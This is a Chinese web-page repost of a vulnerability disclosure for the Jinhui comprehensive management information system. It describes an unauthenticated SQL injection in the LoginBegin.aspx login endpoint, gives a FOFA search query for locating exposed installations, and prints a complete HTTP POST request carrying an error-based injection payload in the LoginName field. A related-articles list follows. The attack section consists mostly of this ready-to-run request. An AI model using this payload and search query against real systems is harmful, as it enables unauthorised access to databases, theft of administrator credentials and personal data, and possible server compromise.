当前位置: 首页 > article >正文

漏洞披露-金慧-综合管理信息系统-SQL

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://wwlib.cn/index.php/artread/artid/6607.html

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

0x01 产品简介

金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。

0x02 漏洞概述

由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

图片

0x03 复现环境

FOFA:body="/Portal/LoginBegin.aspx"

0x04 漏洞复现

payload:

POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
 
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=

效果图:
 

图片


http://www.kler.cn/a/280519.html

相关文章:

  • 方法引用
  • 【Linux系统编程】system V——信号量
  • 数据库-建表时是否需要设置外键?有啥影响?
  • 搭建自己的金融数据源和量化分析平台(七):定时更新上市公司所属行业门类及大类
  • Linux之shell脚本的if分支
  • 猫咪浮毛如何清理?希喂、安德迈、范罗士宠物空气净化器功能实测
  • VMware虚拟化常见故障问题及解决方法汇总(不定期更新)
  • 声音克隆GPT-SoVITS 2.0软件和详细的使用教程!
  • Excel技能分享:根据匹配公式设置单元格背景色
  • 基于xr-frame实现微信小程序的人脸识别3D模型叠加AR功能(含源码)
  • 浪潮服务器主板集成RAID常见问题
  • 坐牢第三十一天(c++)
  • USB设备驱动代码分析(鼠标)
  • Jenkins服务安装配置
  • 告别手动录入,自动化PDF转Excel工具精选
  • HTTP代理端口的設置應用
  • 泰国中小企业局局长率考察团到访深兰科技
  • Linux驱动学习之IIC(驱动BH1750)
  • 7-3 最长连续递增子序列--线性表
  • MATLAB 手动实现点云投影滤波器 (76)